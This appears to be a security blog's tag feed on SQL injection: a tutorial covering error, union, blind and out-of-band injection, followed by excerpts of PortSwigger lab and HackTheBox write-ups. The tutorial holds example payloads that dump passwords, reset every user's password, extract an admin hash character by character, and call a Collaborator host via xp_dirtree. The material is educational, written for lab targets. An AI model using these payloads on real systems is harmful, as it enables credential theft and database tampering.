Sqli on s4yhii's blog https://blog.s4yhii.com/tags/sqli/ Recent content in Sqli on s4yhii's blog s4yhii's blog https://blog.s4yhii.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E https://blog.s4yhii.com/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E Hugo -- 0.155.3 en-us Tue, 25 Jan 2022 12:00:00 -0400 SQL Injection https://blog.s4yhii.com/posts/2022-01-25-sql-injection/ Tue, 25 Jan 2022 12:00:00 -0400 https://blog.s4yhii.com/posts/2022-01-25-sql-injection/ <p>A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application’s database by supplying malicious input inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped and can lead to authentication bypass, sensitive data leaks, tampering of the database and RCE in some cases. <img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/Portswigger/sqli1.jpg"></p> <h2 id="in-band-classic-sql-injection">In-Band (classic) SQL Injection</h2> <ul> <li>Occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack <ul> <li>Retrieved data is presented directly in the web page</li> </ul> </li> <li>Easier to exploit than other categories of SQLi</li> </ul> <h3 id="error-based-sqli">Error-Based SQLi</h3> <ul> <li>Error bases SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www.random.com/app.php?id<span class="o">=</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1">#output</span> </span></span><span class="line"><span class="cl"><span class="c1">#You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version...</span> </span></span></code></pre></div><h3 id="union-based-sqli">Union-Based SQLi</h3> <ul> <li>Is an in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set</li> <li>Input:</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="o">#</span><span class="w"> </span><span class="n">retrieving</span><span class="w"> </span><span class="k">data</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">another</span><span class="w"> </span><span class="k">table</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="err">’</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">username</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">users</span><span class="p">;</span><span class="w"> </span><span class="c1">-- </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="w"> </span><span class="k">update</span><span class="w"> </span><span class="k">all</span><span class="w"> </span><span class="n">passwords</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="k">table</span><span class="w"> </span><span class="k">with</span><span class="w"> </span><span class="n">POST</span><span class="w"> </span><span class="k">method</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">new_password</span><span class="o">=</span><span class="s2">&#34;password12345&#39;;--&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">query</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">UPDATE</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">SET</span><span class="w"> </span><span class="n">Password</span><span class="o">=</span><span class="s1">&#39;password12345&#39;</span><span class="p">;</span><span class="c1">-- WHERE Id = 2; </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="c1">--- The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table, and change all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password </span></span></span></code></pre></div><h2 id="inferential-blind-sql-injection">Inferential (Blind) SQL Injection</h2> <ul> <li>SQLi vuln where there is no actual transfer of data via the webapp</li> <li>Just as dangerous as in-band SQLi <ul> <li>Attacker be able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB Server</li> </ul> </li> <li>Takes longer to exploit than in-ban sql injection</li> </ul> <h3 id="boolean-based-sqli">Boolean-based SQLi</h3> <ul> <li>Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="p">(</span><span class="k">false</span><span class="p">)</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span></span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">User</span><span class="w"> </span><span class="k">table</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">Administrator</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="n">e3c3889ded99ej29dj9edjdje992</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">SUBSTRING</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="k">c</span><span class="p">):</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="n">that</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">part</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">string</span><span class="w"> </span><span class="n">a</span><span class="p">:</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">string</span><span class="p">,</span><span class="w"> </span><span class="n">b</span><span class="p">:</span><span class="n">the</span><span class="w"> </span><span class="k">first</span><span class="w"> </span><span class="n">posicion</span><span class="p">,</span><span class="w"> </span><span class="k">c</span><span class="o">=</span><span class="n">how</span><span class="w"> </span><span class="n">many</span><span class="w"> </span><span class="n">chars</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">Username</span><span class="w"> </span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;s&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Query</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">Where</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;s&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="k">result</span><span class="p">:</span><span class="w"> </span><span class="k">nothing</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">returned</span><span class="w"> </span><span class="n">because</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="k">false</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Payload</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="n">www</span><span class="p">.</span><span class="n">random</span><span class="p">.</span><span class="n">com</span><span class="o">/</span><span class="n">app</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">Where</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;e&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="n">Query</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="k">select</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="k">where</span><span class="w"> </span><span class="n">id</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="n">Password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">Username</span><span class="o">=</span><span class="s1">&#39;Administrator&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="s1">&#39;e&#39;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="o">#</span><span class="k">result</span><span class="p">:</span><span class="w"> </span><span class="n">Returned</span><span class="w"> </span><span class="k">true</span><span class="p">,</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">tile</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">product</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">returned</span><span class="w"> </span><span class="n">bc</span><span class="w"> </span><span class="s2">&#34;e&#34;</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">first</span><span class="w"> </span><span class="nb">character</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">hashed</span><span class="w"> </span><span class="n">pass</span><span class="w"> </span></span></span></code></pre></div><h3 id="time-based-blind-sqli">Time-based Blind SQLi</h3> <ul> <li>Relies in the database pausing for a specified amount of time, then returning the result, indicating a success SQL query execution</li> <li>Ex: if the first character of the administrator’s hashed pass is an “a”, wait 10 seconds.</li> </ul> <h2 id="out-of-band-oast-sqli">Out-of-band (OAST) SQLi</h2> <ul> <li>Consists of triggering an out-of-band network connection to a system that you control <ul> <li>Not common, uses variety os protocols (DNS,HTTP)</li> </ul> </li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="s1">&#39;; exec master..xp_dirtree &#39;</span><span class="o">//</span><span class="mi">434934839493499</span><span class="p">.</span><span class="n">burpcollabolator</span><span class="p">.</span><span class="n">net</span><span class="o">/</span><span class="n">a</span><span class="s1">&#39;-- </span></span></span></code></pre></div><h2 id="second-order-sqli">Second order SQLi</h2> <p>Second order SQLi happens when applications user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example consider an app that register an user by specifying username and password, and the user submit the following request:</p> SQL Injection - Labs https://blog.s4yhii.com/posts/2022-01-26-sql-injection-labs/ Tue, 25 Jan 2022 12:00:00 -0400 https://blog.s4yhii.com/posts/2022-01-26-sql-injection-labs/ <h2 id="lab-1---sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data">Lab 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data</h2> <p>We need to retrieve hidden data so we search query&rsquo;s in the web where we can inject some sql injection payloads</p> <p><img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/Portswigger/sqli4.jpg"></p> <p>We can see that the request is filtering the data by category, and we are asked to show the hidden elements, so we assume that there is a parameter that hides the elements.</p> <p>We try the following payload that will show the elements of all categories and we will comment out the rest of the query so that it does not filter by hidden or visible elements:</p> HackTheBox Jarvis https://blog.s4yhii.com/posts/2021-11-15-jarvis-htb/ Mon, 15 Nov 2021 12:00:00 -0400 https://blog.s4yhii.com/posts/2021-11-15-jarvis-htb/ <p><strong>Machine IP</strong>: 10.10.10.143</p> <h3 id="reconocimiento">Reconocimiento</h3> <p>Primero hacemos un escaneo de puertos para saber cuales están abiertos y conocer sus servicios correspondientes</p> <h3 id="nmap">Nmap</h3> <p><img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/htb/jarvis/nmap.png"></p> <p>Como vemos tiene el puerto 80 abierto, que es el http, veremos en el navegador de que se trata y analizaremos la web.</p> <h3 id="wappalyzer">Wappalyzer</h3> <p>Usando la extensión wappalizer para identificar las tecnologías usadas en la web, encontramos que la web está usando phpmyadmin version 4.8</p> <p><img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/htb/jarvis/wappa.png"></p> <p>Al hacer un poco de research encontramos la siguiente vulnerabilidad <a href="https://www.exploit-db.com/exploits/50457">phpMyAdmin 4.8.1 - Remote Code Execution (RCE)</a> , que se aprovecha del ejecutar comandos a traves de parametros sql.</p> HackTheBox Writeup https://blog.s4yhii.com/posts/2021-07-25-writeup-htb/ Sun, 25 Jul 2021 12:00:00 -0400 https://blog.s4yhii.com/posts/2021-07-25-writeup-htb/ <hr> <p><strong>Machine IP</strong> : 10.10.10.138</p> <p><strong>DATE</strong> : 25/07/2021</p> <hr> <h2 id="matriz-de-la-maquina">Matriz de la maquina</h2> <p>Esta matriz nos muestra las características de explotación de la maquina.</p> <p><img loading="lazy" src="https://raw.githubusercontent.com/s4yhii/s4yhii.github.io/master/assets/images/htb/writeup/matrix.png"></p> <h2 id="reconocimiento">Reconocimiento</h2> <p>Primero hacemos un escaneo de puertos para saber cuales están abiertos y conocer sus servicios correspondientes.</p> <h2 id="nmap">Nmap</h2> <p>Usamos el siguiente comando para escanear todos los puertos de una manera rapida.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -p- --open -T5 -v -n -Pn 10.10.10.138 </span></span></code></pre></div><p>Posteriormente utilizamos este comando con los puertos del anterior escaneo para saber las versiones de cada servicio.</p>